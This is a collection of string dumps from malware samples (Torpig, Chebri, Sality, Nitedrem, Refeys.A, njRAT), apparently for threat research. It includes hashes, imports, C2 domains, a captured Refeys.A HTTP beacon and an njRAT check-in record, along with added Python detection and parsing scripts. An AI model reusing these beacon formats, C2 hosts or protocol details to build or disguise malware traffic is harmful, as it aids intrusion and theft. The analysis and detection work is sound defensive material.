+Mozilla/4.0 (compatible; MSIE 8.0; Win32)
%s %s
HTTP/1.1
.exe
kernel32.dll
CreateProcessA
1234567890123456
HTTP/1.1
Software\Microsoft\Windows NT\CurrentVersion\Windows
load
4444
mmlmmlmmmmlmmmmmkmmlmmlmmmmmmmmmmmmmmmmmlmmmmlmmlmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm2
4444
npoppnomnomnmppnopomopommmnopmpnmonpppomopmooopmoppponpppmmpnompmompopnnompnopmmmmmoopoom2
4444
ppppppqpppppppppsqpqprpppppppprpqppqrrprpqspppqrppprpppprqqrppppqpppprprpqpppqppppppppppr'
4444
pssssssqrssssssspqssssssprqsssssssqrqssqsrrsqssrrqrsssrqsspsqqsspsqqsssspsssssqqqrrsqssss(
4444
vtwvtvvttstvwwvtwsvsswvtsvtsvtwstwvsssvvtsssssswvswsssswsttvsssswwsssvwstwvswvssswtvvsvvv(
4444
wwwwwwwwwwwwxwwwxwwwwwwwwwwtwwwwwwxwwwwwuwwwwwwxtwwwwwwwwwwwwwwwwwwxwxwwwwwwwwwwwwwxwwwww)
4444
xyyzzzwyzyzzzzwzwwxzzyxzzzyyzzxxzzwxxxyxxxzzzzxyyyywzzzxyyxzzxzxzxyywyzzzwxxzxzyyxzzxwzzz*
4444
xyyzzzwyzyzzzzwzwwxzzyxzzzyyzzxxzzwxxzz|zz|{zzz{|zzz{z{zzzzzzz|z{z{z{{z{zzzzzz{{{zzz{z{{{+
4444
zz{{zz|{zzzzzz|}zzzzzzzzzz{z{|zz{zzz|{}}}}{}}}}{}{}}}}{}}}}{}}}}}}}{}}{}{}}{{}}zz}}}{}}}},
4444
}}}{{{}}}{{}{{{}}{}}{{}}}{}}}{z}{}}{}{}}}}{}}}}{}{}}}}{}}}}{}}}}}}}{}}{}{}}{{}}zz}}}{}}}},
4444
}}}~}~}~~~~~}~~~~
~~~}~}}
}}~~~
}~}}~}}~~}~~~~~~~~
}~~}
~~~}}
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
44444
333333333333333333333333333333333333333333333333333333333333333333333
4444444
333333333333333
444444444
33333333333333
4444444444444444444444444444444444444444444444444444444444444444
444444444444444444444444444444444444444444444444444444444444444444
444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444
MS User
bjbjqPqP

Unicode Strings:
---------------------------------------------------------------------------
(null)
IDI_ICON1
Root Entry
Root Entry
1Table
CompObj
WordDocument
SummaryInformation
DocumentSummaryInformation
Unknown
Times New Roman
Symbol
Arial
SimSun
!),.:;?]}
MS User
MS User


Torpig miniloader strings - CRIME

File: Torpig miniloader_0F82964CF39056402EE2DE9193635B34
MD5:  0f82964cf39056402ee2de9193635b34
Size: 242688

Ascii Strings:
---------------------------------------------------------------------------
!This program cannot be run in DOS mode.
Richw]
.text
`.data
.rsrc
C:\TEST\bar.txt
RSDS
packaigee.pdb
---------------------snip
UrlIsW
PathGetDriveNumberA
SHRegWriteUSValueW
StrFormatKBSizeW
PathIsDirectoryA
PathIsDirectoryEmptyA
PathRemoveBlanksA
SHLWAPI.dll
EnumResourceLanguagesA
VirtualAlloc
FillConsoleOutputCharacterW
SetEvent
GetDriveTypeA
DosDateTimeToFileTime
HeapAlloc
ClearCommBreak
WriteFileEx
InterlockedIncrement
OpenEventW
OpenThread
CreateTimerQueue
RemoveDirectoryW
GetProcessHeap
GetFileInformationByHandle
WritePrivateProfileStructA
SetVolumeMountPointW
GetVolumeInformationW
RequestDeviceWakeup
MapUserPhysicalPages
GetFullPathNameA
GetFileSize
GetThreadContext
FreeConsole
SizeofResource
GetBinaryTypeA
GetPrivateProfileIntW
FindVolumeClose
SetMailslotInfo
kernel32.dll
----------------------------snip
Unicode Strings:
---------------------------------------------------------------------------
VS_VERSION_INFO
StringFileInfo
040904E4
CompanyName
Brau Holding International AG
FileDescription
Paulaner tool
FileVersion
4.0.0012
InternalName
paulaner.exe
LegalCopyright
 Brau Holding International AG. All rights reserved.
OriginalFilename
paulaner.exe
ProductName
Brau Holding International AG
 Paulaner tool
ProductVersion
4.0.0012
VarFileInfo
Translation
====================================
File: Torpig miniloader_83419EEA712182C1054615E4EC7B8CBE
MD5:  83419eea712182c1054615e4ec7b8cbe
Size: 247808

Ascii Strings:
---------------------------------------------------------------------------
!This program cannot be run in DOS mode.
Richw]
.text
`.data
.rsrc
C:\TEST\bar.txt
RSDS</
nantietive.pdb
-------------------------snip
UrlIsW
PathGetDriveNumberA
SHRegWriteUSValueW
StrFormatKBSizeW
PathIsDirectoryA
PathIsDirectoryEmptyA
PathRemoveBlanksA
SHLWAPI.dll
EnumResourceLanguagesA
VirtualAlloc
FillConsoleOutputCharacterW
SetEvent
GetDriveTypeA
DosDateTimeToFileTime
HeapAlloc
ClearCommBreak
WriteFileEx
InterlockedIncrement
OpenEventW
OpenThread
CreateTimerQueue
RemoveDirectoryW
GetProcessHeap
GetFileInformationByHandle
WritePrivateProfileStructA
SetVolumeMountPointW
GetVolumeInformationW
RequestDeviceWakeup
MapUserPhysicalPages
GetFullPathNameA
GetFileSize
GetThreadContext
FreeConsole
SizeofResource
GetBinaryTypeA
GetPrivateProfileIntW
FindVolumeClose
SetMailslotInfo
kernel32.dll
--------------------------snip

Unicode Strings:
---------------------------------------------------------------------------
VS_VERSION_INFO
StringFileInfo
040904E4
CompanyName
Brau Holding International AG
FileDescription
Paulaner tool
FileVersion
4.0.0012
InternalName
paulaner.exe
LegalCopyright
 Brau Holding International AG. All rights reserved.
OriginalFilename
paulaner.exe
ProductName
Brau Holding International AG
 Paulaner tool
ProductVersion
4.0.0012
VarFileInfo


Chebri.C strings - CRIME

File: Chebri_B605C8E99315C330A015F36DE2A870EE
MD5:  b605c8e99315c330a015f36de2a870ee
Size: 8704

Ascii Strings:
---------------------------------------------------------------------------
!This program cannot be run in DOS mode.
jRich
.text
.rdata
@.data
.reloc
iqsoyyo
czgorvv
dzzrsap
acndvrb
hkppjev
nbdcisi
WS2_32.dll
SHSetValueW
SHLWAPI.dll
ExitProcess
lstrlenA
CreateProcessW
WaitForSingleObject
GetModuleHandleW
GetTickCount
Sleep
CopyFileW
GetFileAttributesW
GetModuleFileNameW
lstrlenW
GetLastError
LocalAlloc
lstrcatW
CreateMutexA
ReleaseMutex
CloseHandle
LocalFree
CreateThread
KERNEL32.dll
wsprintfW
USER32.dll
ShellExecuteW
SHGetSpecialFolderPathW
SHELL32.dll
AANCHODAACHEV_AND_BRIANKREBS_GOT_MARRIED
24131194125.com

Unicode Strings:
---------------------------------------------------------------------------
\regsrv33.exe
dows\Cur
Soft
ware\
on\R
Microso
rentVersi
ft\Win
%s%s%s%s%s%s%s%s
Microsoft DLL Registaation
regsrv33.exe


=======================
File: Chebri_B1960078B67184BFBE3A1B351DC38471
MD5:  b1960078b67184bfbe3a1b351dc38471
Size: 8704

Ascii Strings:
---------------------------------------------------------------------------
!This program cannot be run in DOS mode.
jRich
.text
.rdata
.data
.reloc
WS2_32.dll
SHSetValueW
SHLWAPI.dll
ExitProcess
lstrlenA
CreateProcessW
WaitForSingleObject
GetModuleHandleW
GetTickCount
Sleep
CopyFileW
GetFileAttributesW
GetModuleFileNameW
lstrlenW
GetLastError
LocalAlloc
lstrcatW
CreateMutexA
ReleaseMutex
CloseHandle
LocalFree
CreateThread
KERNEL32.dll
wsprintfW
USER32.dll
ShellExecuteW
SHGetSpecialFolderPathW
SHELL32.dll
DANCHODANCHEV_END_BRIANKREBS_GOT_FARRIED
aquartmale.org

Unicode Strings:
---------------------------------------------------------------------------
\regsrv34.exe
dows\Cur
Soft
ware\
on\R
Microso
rentVersi
ft\Win
%s%s%s%s%s%s%s%s
Microsoft DLL Registrations
regsrv34.exe

=================================
File: Chebri_AF93638AC05F9636550C1959127D1471
MD5:  af93638ac05f9636550c1959127d1471
Size: 7964

Ascii Strings:
---------------------------------------------------------------------------
!This program cannot be run in DOS mode.
jRich
.text
`.rdata
@.data
.reloc
WS2_32.dll
SHSetValueW
SHLWAPI.dll
ExitProcess
lstrlenA
CreateProcessW
WaitForSingleObject
GetModuleHandleW
GetTickCount
Sleep
CopyFileW
GetFileAttributesW
GetModuleFileNameW
lstrlenW
GetLastError
LocalAlloc
lstrcatW
CreateMutexA
ReleaseMutex
CloseHandle
LocalFree
CreateThread
KERNEL32.dll
wsprintfW
USER32.dll
ShellExecuteW
SHGetSpecialFolderPathW
SHELL32.dll
AANCHODANCHEV_AND_BRIANKREBS_GOT_MARRIED

Unicode Strings:
---------------------------------------------------------------------------
\regsrv32.exe
dows\Cur
Soft
ware\
on\R
Microso
rentVersi
ft\Win
%s%s%s%s%s%s%s%s
Microsoft DLL Registaation


Sality strings - CRIME

File: sality
MD5:  ceaf4d9e1f408299144e75d7f29c1810
Size: 997537

Ascii Strings:
---------------------------------------------------------------------------
!This program cannot be run in DOS mode.
"RichVE
.text
.rdata
.data
.rsrc
.penask
.adata
. rdata
------------------------------------------snip
kernel32.dll
ExitProcess
user32.dll
MessageBoxA
wsprintfA
LOADER ERROR
The procedure entry point %s could not be located in the dynamic link library %s
The ordinal %u could not be located in the dynamic link library %s
kernel32.dll
GetProcAddress
GetModuleHandleA
LoadLibraryA
advapi32.dll
comctl32.dll
comdlg32.dll
gdi32.dll
mpr.dll
ole32.dll
oleaut32.dll
shell32.dll
user32.dll
version.dll
winmm.dll
wsock32.dll
RegEnumValueW
ImageList_EndDrag
GetSaveFileNameW
MoveToEx
WNetUseConnectionW
OleSetContainedObject
DragQueryPoint
GetWindowTextLengthW
GetFileVersionInfoSizeW
waveOutSetVolume
------------------------------------------snip

Unicode Strings:
---------------------------------------------------------------------------

Nitedrem strings - CRIME

MD5:  508af8c499102ad2ebc1a83fdbcefecb
Size: 147456

Ascii Strings:
---------------------------------------------------------------------------
!This program cannot be run in DOS mode.
Rich
.text
`.data
.rsrc
MSVBVM60.DLL
Project1
Project1
user32
VB5!
Project1
Project1
Project1
Module1
Project1
user32
CallWindowProcA
kernel32
FindResourceA
LoadResource
LockResource
SizeofResource
FreeResource
GetModuleFileNameA
RtlMoveMemory
VBA6.DLL
__vbaAryCopy
__vbaUI1I2
__vbaUbound
__vbaErrorOverflow
__vbaRedimPreserve
__vbaAryUnlock
__vbaAryLock
__vbaStrCopy
__vbaFreeStr
__vbaAryDestruct
__vbaFreeVar
__vbaStrVarMove
__vbaStrMove
__vbaSetSystemError
__vbaGenerateBoundsError
__vbaAryConstruct2
__vbaExitProc
__vbaCyI2
__vbaCyAdd
__vbaOnError
__vbaCyStr
__vbaFreeObj
__vbaHresultCheckObj
__vbaNew2
MSVBVM60.DLL
_CIcos
_adj_fptan
__vbaFreeVar
__vbaStrVarMove
_adj_fdiv_m64
_adj_fprem1
__vbaSetSystemError
__vbaHresultCheckObj
_adj_fdiv_m32
__vbaAryDestruct
__vbaExitProc
__vbaOnError
__vbaCyAdd
_adj_fdiv_m16i
_adj_fdivr_m16i
__vbaCyStr
_CIsin
__vbaChkstk
__vbaGenerateBoundsError
__vbaCyI2
__vbaAryConstruct2
DllFunctionCall
__vbaRedimPreserve
_adj_fpatan
__vbaUI1I2
_CIsqrt
__vbaExceptHandler
_adj_fprem
_adj_fdivr_m64
__vbaFPException
__vbaUbound
_CIlog
__vbaErrorOverflow
__vbaNew2
_adj_fdiv_m32i
_adj_fdivr_m32i
__vbaStrCopy
_adj_fdivr_m32
_adj_fdiv_r
__vbaAryLock
_CIatan
__vbaStrMove
__vbaAryCopy
_allmul
_CItan
__vbaAryUnlock
_CIexp
__vbaFreeObj
__vbaFreeStr
nRSI
JHU]H[W
Y[TTUN
WU^_
hSYR
---------------------------------------snip
Ebjnjim
:::l:i:e:l:
:h:i:s:u:t:e:s:t:|:u:::::
::;:::;:::::::;:::::::::::::>:::;:::::::::::::::~:::::l:[:H:|:S:V:_:s:T:\:U:::::
:>:::n:H:[:T:I:V:[:N:S:U:T:::::>2
;::;:i:N:H:S:T:]:|:S:V:_:s:T:\:U:::*;::;:
:(:;:j:H:U:^:O:Y:N:t:[:W:_:::::j:H:U:P:_:Y:N:
:0:;:|:S:V:_:l:_:H:I:S:U:T:::::
:0:;:j:H:U:^:O:Y:N:l:_:H:I:S:U:T:::
:0:;:s:T:N:_:H:T:[:V:t:[:W:_:::I:N:O:X:::::
:(:;:u:H:S:]:S:T:[:V:|:S:V:_:T:[:W:_:::I:N:O:X:
:_:B:_:::::::::::::::::
~vv:wilxlw
~vv:::vU[^vSXH[HC{::}_NjHUY{^^H_II::lSHNO[VjHUN_YN::
BSNjHUY_II:::::::::::::::::::::::P

Unicode Strings:
---------------------------------------------------------------------------
@*\Ac:\Project1.vbp
1000000
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
040904B0
ProductName
Project1
FileVersion
1.00
ProductVersion
1.00
InternalName
Project1
OriginalFilename
Project1.exe

Refeys.A strings - CRIME

Traffic

POST /sys.php HTTP/1.0
Host: rxform.org
Content-type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.0.1) Gecko/20021216 Chimera/0.6
Referer:  http://www.gmail.com
Content-length: 112
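
The excerpt above is the Refeys.A beacon: an HTTP/1.0 form POST to rxform.org/sys.php carrying a Referer of www.gmail.com, which cannot have linked there, and the User-Agent of Chimera 0.6, a 2002 Mac OS X Gecko browser, hard-coded into a Win32 executable. As an added example, not code from the page, the script below parses raw requests and reports which of those traits are present, so that the C2 domain alone is never the whole signature. The benign request, the function names and the two-hit threshold are mine.

```python
from urllib.parse import urlsplit

# Constructed samples. The first reproduces the Refeys.A POST from the capture above,
# headers only, because the page does not show the 112-byte body; the second is an
# ordinary browser request written here for contrast.
REFEYS_BEACON = (
    "POST /sys.php HTTP/1.0\r\n"
    "Host: rxform.org\r\n"
    "Content-type: application/x-www-form-urlencoded\r\n"
    "User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.0.1) "
    "Gecko/20021216 Chimera/0.6\r\n"
    "Referer: http://www.gmail.com\r\n"
    "Content-length: 112\r\n"
    "\r\n"
)
BENIGN_REQUEST = (
    "GET /index.html HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:10.0) Gecko/20100101 Firefox/10.0\r\n"
    "Referer: http://www.example.com/\r\n"
    "\r\n"
)

# Static values lifted from the capture.
REFEYS_C2_HOST = "rxform.org"
REFEYS_URI = "/sys.php"
REFEYS_UA_TOKEN = "Chimera/0.6"


def parse_request(raw: str) -> dict:
    """Split a raw HTTP request into request line, lower-cased header map and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, uri, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return {"method": method, "uri": uri, "version": version,
            "headers": headers, "body": body}


def refeys_indicators(req: dict) -> list:
    """Return the Refeys.A traits present in a parsed request (empty list if none)."""
    h = req["headers"]
    host = h.get("host", "").lower()
    hits = []
    # 1. The captured C2: cheapest and most specific, but dies with the domain.
    if host == REFEYS_C2_HOST:
        hits.append("host is the captured C2 " + REFEYS_C2_HOST)
    # 2. HTTP/1.0 form POST to /sys.php: how the bot talks, independent of the domain.
    if req["method"] == "POST" and req["version"] == "HTTP/1.0" and req["uri"] == REFEYS_URI:
        hits.append("HTTP/1.0 POST to " + REFEYS_URI)
    # 3. Chimera 0.6 is a Mac-only browser from 2002; a Windows host never sends it.
    if REFEYS_UA_TOKEN in h.get("user-agent", ""):
        hits.append("hard-coded Mac-only User-Agent " + REFEYS_UA_TOKEN)
    # 4. A Referer on gmail.com for a POST to some other host: nothing on Gmail
    #    links to a third-party form, so the header is forged.
    ref_host = (urlsplit(h.get("referer", "")).hostname or "").lower()
    if ref_host and ref_host != host and ref_host.endswith("gmail.com"):
        hits.append("forged Referer " + h["referer"])
    return hits


def is_refeys_beacon(raw: str, min_hits: int = 2) -> bool:
    """Two independent traits make a detection; one (e.g. the domain) is only a lead."""
    return len(refeys_indicators(parse_request(raw))) >= min_hits


if __name__ == "__main__":
    for sample in (REFEYS_BEACON, BENIGN_REQUEST):
        print(is_refeys_beacon(sample), refeys_indicators(parse_request(sample)))
```

Traits 2 to 4 survive a C2 move, which is why the verdict needs two of them rather than the domain alone; the Content-length of 112 is left out of the rule because the page does not show the body, so there is nothing to say about what a different length would mean.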



File: Refeys.A_BEDE0DA1ABC1122ACF8AF91F6D6B289F.exe_
MD5:  bede0da1abc1122acf8af91f6d6b289f
Size: 58880


Ascii Strings:
---------------------------------------------------------------------------
!This program cannot be run in DOS mode.
.text
`.rdata
@.data
.sxdata
.rsrc
@.reloc
-------------------snip
CRYPT32.dll
CertAddCRLContextToStore
CertAddCRLLinkToStore
CertAddCTLContextToStore
CertAddCTLLinkToStore
CertAddCertificateContextToStore
CertAddCertificateLinkToStore
CertAddEncodedCRLToStore
CertAddEncodedCTLToStore
CertAddEncodedCertificateToStore
CertAddEncodedCertificateToSystemStoreA
CertAddEncodedCertificateToSystemStoreW
CertAddEnhancedKeyUsageIdentifier
CertAddSerializedElementToStore
CertAddStoreToCollection
CertAlgIdToOID
CertCloseStore
CertCompareCertificate
CertCompareCertificateName
CertCompareIntegerBlob
CertComparePublicKeyInfo
CertControlStore
CertCreateCRLContext
CertCreateCTLContext
CertCreateCTLEntryFromCertificateContextProperties
CertCreateCertificateChainEngine
CertCreateCertificateContext
CertCreateContext
CertCreateSelfSignCertificate
CertDeleteCRLFromStore
CertDeleteCTLFromStore
CertDeleteCertificateFromStore
CertDuplicateCRLContext
CertDuplicateCTLContext
CertDuplicateCertificateChain
CertDuplicateCertificateContext
CertDuplicateStore
CertEnumCRLContextProperties
CertEnumCRLsInStore
CertEnumCTLContextProperties
CertEnumCTLsInStore
CertEnumCertificateContextProperties
CertEnumCertificatesInStore
CertEnumPhysicalStore
CertEnumSubjectInSortedCTL
CertEnumSystemStore
CertEnumSystemStoreLocation
CertFindAttribute
CertFindCRLInStore
CertFindCTLInStore
CertFindCertificateInCRL
CertFindCertificateInStore
CertFindChainInStore
CertFindExtension
CertFindRDNAttr
CertFindSubjectInCTL
CertFindSubjectInSortedCTL
CertFreeCRLContext
CertFreeCTLContext
CertFreeCertificateChain
CertFreeCertificateChainEngine
CertFreeCertificateContext
CertGetCRLContextProperty
CertGetCRLFromStore
CertGetCTLContextProperty
CertGetCertificateChain
CertGetCertificateContextProperty
CertGetEnhancedKeyUsage
CertGetIntendedKeyUsage
CertGetIssuerCertificateFromStore
CertGetNameStringA
CertGetNameStringW
CertGetPublicKeyLength
CertGetStoreProperty
CertGetSubjectCertificateFromStore
CertGetValidUsages
CertIsRDNAttrsInCertificateName
CertIsValidCRLForCertificate
CertNameToStrA
CertNameToStrW
CertOIDToAlgId
CertOpenStore
CertOpenSystemStoreA
CertOpenSystemStoreW
CertRDNValueToStrA
CertRDNValueToStrW
CertRegisterPhysicalStore
CertRegisterSystemStore
CertRemoveEnhancedKeyUsageIdentifier
CertRemoveStoreFromCollection
CertResyncCertificateChainEngine
CertSaveStore
CertSerializeCRLStoreElement
CertSerializeCTLStoreElement
CertSerializeCertificateStoreElement
CertSetCRLContextProperty
CertSetCTLContextProperty
CertSetCertificateContextPropertiesFromCTLEntry
CertSetCertificateContextProperty
CertSetEnhancedKeyUsage
CertSetStoreProperty
CertStrToNameA
CertStrToNameW
CertUnregisterPhysicalStore
CertUnregisterSystemStore
CertVerifyCRLRevocation
CertVerifyCRLTimeValidity
CertVerifyCTLUsage
CertVerifyCertificateChainPolicy
CertVerifyRevocation
CertVerifySubjectCertificateContext
CertVerifyTimeValidity
CertVerifyValidityNesting
ChainWlxLogoffEvent
CloseCertPerformanceData
CollectCertPerformanceData
CreateFileU
CryptAcquireCertificatePrivateKey
CryptAcquireContextU
CryptBinaryToStringA
CryptBinaryToStringW
CryptCloseAsyncHandle
CryptCreateAsyncHandle
CryptCreateKeyIdentifierFromCSP
CryptDecodeMessage
CryptDecodeObject
CryptDecodeObjectEx
CryptDecryptAndVerifyMessageSignature
CryptDecryptMessage
CryptEncodeObject
CryptEncodeObjectEx
CryptEncryptMessage
CryptEnumKeyIdentifierProperties
CryptEnumOIDFunction
CryptEnumOIDInfo
CryptEnumProviders
GetVersion
VirtualAlloc
GetCurrentProcessId
IsBadCodePtr
GetDiskFreeSpaceW
GetSystemTimeAsFileTime
GetSystemDirectoryA
lstrcmpi
FileTimeToSystemTime
lstrcpy
GetModuleHandleA
SleepEx
SetCurrentDirectoryW
CreateThread
CreateDirectoryA
GetExpandedNameA
GetThreadPriority
WinExec
KERNEL32.DLL
CreateWindowExW
SetWindowLongA
GetFocus
IsDlgButtonChecked
GetMenuStringW
CreateDialogParamA
GetForegroundWindow
CreateMenu
CreateDialogIndirectParamW
SetActiveWindow
wvsprintfW
DialogBoxIndirectParamW
GetClassInfoExW
GetTopWindow
SetWindowLongW
USER32.DLL
VarDecFromI1
VarUI8FromUI2
VarDecSub
VarCyFromR4
VarR8FromDate
OleLoadPictureEx
VarDateFromI8
VarDecFromCy
VarDateFromUI4
VarDateFromI1
VarDecCmp
VarR8FromDec
VarI2FromUI8
VarRound
RegisterTypeLib
VarDecFromUI8
VarUI8FromDate
VarDateFromStr
VarR8Pow
VarUI1FromBool
VarI4FromR4
VarDateFromUdate
VarBstrFromUI2
VarImp
DispGetIDsOfNames
VarCySub
GetVarConversionLocaleSetting
oleaut32.dll
CreateEllipticRgn
TranslateCharsetInfo
CreateFontW
CreateICW
gdi32.dll
---------------------snip
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
  <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
    <security>
      <requestedPrivileges>
        <requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
      </requestedPrivileges>
    </security>
  </trustInfo>
</assembly>

Unicode Strings:
---------------------------------------------------------------------------
Bitet
Jebo
Coposa
VS_VERSION_INFO
StringFileInfo
04090000
LegalCopyright
fLiqjPPlr
CompanyName
Yaldex Software
FileVersion
0.9.7.7
VarFileInfo
Translation

njRat / Backdoor.LV strings - APT

C2 checkin
lv|'|'|TndfQzQyNjRFQkI=|'|'|VICTIM|'|'|Examiner|'|'|2013-06-21|'|'|USA|'|'|Win XP ProfessionalSP2 x86|'|'|No|'|'|0.5.0E|'|'|..|'|'|Y3B0YnRfUHJvY2Vzc19SZWdpc3RyeV9GaWxlX0luZm8ubG9nIC0gTm90ZXB hZA==|'|'|[endof]act|'|'| Y3B0YnRfUHJvY2Vzc19SZWdpc3RyeV9GaWxlX0luZm8ubG9nIC0gTm90ZXBhZA==
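
The check-in above is one record of njRAT's own TCP protocol (the `lv` prefix is the string behind the Backdoor.LV alias): fields are separated by `|'|'|`, `[endof]` closes a record, and two fields, the victim ID and the title of the foreground window, are base64. The two spaces around the last base64 field are a line-wrap artefact of the dump; the same field appears intact in the `act` record that follows. As an added example, not code from the page or from the njRAT author, the parser below splits a reassembled stream into records and decodes them; the field labels are my reading of the captured values, since the page does not document the bot's field order.

```python
import base64
import binascii

DELIM = "|'|'|"
RECORD_END = "[endof]"

# The check-in captured above, copied verbatim including the two line-wrap spaces.
CHECKIN = (
    "lv|'|'|TndfQzQyNjRFQkI=|'|'|VICTIM|'|'|Examiner|'|'|2013-06-21|'|'|USA|'|'|"
    "Win XP ProfessionalSP2 x86|'|'|No|'|'|0.5.0E|'|'|..|'|'|"
    "Y3B0YnRfUHJvY2Vzc19SZWdpc3RyeV9GaWxlX0luZm8ubG9nIC0gTm90ZXB hZA==|'|'|[endof]"
    "act|'|'| Y3B0YnRfUHJvY2Vzc19SZWdpc3RyeV9GaWxlX0luZm8ubG9nIC0gTm90ZXBhZA=="
)

# Labels are mine, assigned from what each captured value plainly is.
LV_FIELDS = ["victim_id_b64", "hostname", "username", "install_date", "country",
             "os", "camera", "version", "marker", "active_window_b64"]


def split_records(stream: str) -> list:
    """Split a reassembled stream into records. '[endof]' terminates a record; a
    trailing record without a terminator (a cut capture) is kept as well."""
    return [r for r in stream.split(RECORD_END) if r.strip()]


def decode_b64(field: str):
    """Base64-decode one field, or return None if it is not valid base64."""
    cleaned = "".join(field.split())  # drop whitespace introduced by line wrapping
    try:
        return base64.b64decode(cleaned, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None


def parse_record(record: str) -> dict:
    """Parse one record into a dict keyed by the labels above, base64 fields decoded."""
    fields = record.split(DELIM)
    cmd = fields[0]
    if cmd == "lv":
        if len(fields) < len(LV_FIELDS) + 1:
            raise ValueError("short lv record: %d fields" % len(fields))
        out = dict(zip(LV_FIELDS, fields[1:]))
        out["victim_id"] = decode_b64(out.pop("victim_id_b64"))
        out["active_window"] = decode_b64(out.pop("active_window_b64"))
    elif cmd == "act":
        # Foreground-window update: a single base64 title.
        out = {"active_window": decode_b64(fields[1]) if len(fields) > 1 else None}
    else:
        out = {"raw_fields": fields[1:]}
    out["cmd"] = cmd
    return out


if __name__ == "__main__":
    for rec in split_records(CHECKIN):
        print(parse_record(rec))
```

Feeding this a full session gives a timeline of window titles per victim; matching on the literal `|'|'|` delimiter is also a cheap network signature, since no legitimate protocol uses it.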

File: njRAt_1D3BAEDD747F6F9BF92C81EB9F63B34B
MD5:  1d3baedd747f6f9bf92c81eb9f63b34b
Size: 110080

Ascii Strings:
---------------------------------------------------------------------------
!This program cannot be run in DOS mode.
.text
`.sdata
.rsrc
@.reloc
BSJB
v2.0.50727
#Strings
#GUID
#Blob
wLoader
<Module>
aMFlARt1Q2Bj1GVfZb
TD4myOW8ixbVmc0wCF
Object
System
mscorlib
fQYL7B84mmJRdrU3KK
GfSviSAGX5kNVrRoZY
aFguFaGnjXmFgmttaZ
ValueType
RUej1ecCdtNqx4qyoM
guN1kS1eOL6oGKDdfE
qTLWMJmEALehonqjh3
WRCy8fERBet5ywu0Kk
sdZpRUVSS7koDSkkEh
f66BTcSdkEN4CEx3t9
EdNNrCxD0HPEKJXTqU
cPPppT6E99CCcPIf6S
xhBRQknOm7ZDQSrnwO
MNIggEySGpHlVvbxVb
a7kQPSIYJdDIMumlgB
qpZ9r73GjGh2QOug7o
dxM2gVhfcEpIBZpCwk
DYcOPVvOJfyvEp1xkV
sbY9iqoWovmWWJ0nUM
RuDD0QLOk5emcZN8wg
DObaIugU0tWLbjpFmw
GaUC5HQsYK5prBvdTs
.cctor
Void
Int32
JFaSnjXmF
Char
tmtxtaZPU
yj16eCdtN
String
Sx4nqyoM1
JN1ykSeOL
moGIKDdfE
qTL3WMJEA
sehhonqjh
ITfjAvlKX
ResolveEventHandler
.ctor
IntPtr
AssemblyName
System.Reflection
CKxtUKuut
Assembly
ResolveEventArgs
GjMWFlAR1
Stream
System.IO
DeflateStream
System.IO.Compression
BinaryReader
CompressionMode
IDisposable
Dispose
u2B8j1GVf
NblAD4myO
Byte
dixGbVmc0
ACFccQYL7
AppDomain
S4m1mJRdr
H3KmKbfSv
MemoryStream
DSGEX5kNV
Evidence
System.Security.Policy
wRoVZYdFg
paRvCy8fR
Seto5ywu0
l3tX9kdNN
Boolean
zkoLdZpRU
kS7gkoDSk
Type
EEhQG66BT
gdk4EN4CE
OIgCgESGp
wCDr0HPEK
UXTeqUWPP
RuntimeFieldHandle
Dictionary`2
System.Collections.Generic
set_Item
ContainsKey
FpTFE99CC
gPIKf6Srh
SRQwkOm7Z
AQSDrnwOZ
Array
XlVfvbxVb
a7kiQPSYJ
Encoding
System.Text
aDIkMumlg
ShppZ9r7G
aGhb2QOug
Vo85xM2gV
U0nTUMquD
A0QZOk5em
fZNY8wgfO
GaINuU0tW
CcEUpIBZp
CwkMiYcOP
jOJufyvEp
gxk0VLbY9
DqWRovmWW
Monitor
System.Threading
Exit
tbj2pFmwb
WUCO5HsYK
HprPBvdTs
kYaq7siC4
o6lBweZhC
RuntimeTypeHandle
ocwltVChh
EKjJySowb
uCS761TpG
nrqaYDHku
AxbsJWV5c
wu3H1bo1v
X0H9Jljie
dnazyPxpw
R3wjdfxfni
aT4jj0s3ah
add_ResourceResolve
jtIjt1KKdl
Convert
ToBase64String
a0kjWSQ0uD
get_Default
g2Hj8OOgZD
get_Evidence
ayLjAIClxx
get_Name
px5jGJrLDg
get_CurrentDomain
goxjcb5MhH
add_AssemblyResolve
TX5j1lm2m1
Load
u43jm9xksu
GetExecutingAssembly
agnjE8tCcs
MOQjVy6O5F
SQHjSsn9Ta
VkqjxNRl1s
BgVj6XlEda
v4sjnqjyHh
Write
qmGjy1grJG
ReadInt32
BO7jIyv5sV
ExecuteAssemblyByName
F35j3joZVJ
wLTjhXpY8U
SetData
Uyfjvx24AE
ToArray
vofjoVxSNa
Concat
RoTjLBF0qa
GetBytes
fdajgqJRhS
GetData
HCJjQEJ15S
Read
dwOj4beDhk
Enter
YVojXRKUic
GetTypeFromHandle
uIejrjpqIe
ReadBytes
MyMjeCViWv
ToLowerInvariant
ifsjFCCE4D
GetManifestResourceNames
RVsjKwdaRU
RuntimeHelpers
System.Runtime.CompilerServices
InitializeArray
BBSjw85Zv7
GetManifestResourceStream
wLoader.g.resources
STAThreadAttribute
lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
PADPADP
_CorExeMain
mscoree.dll
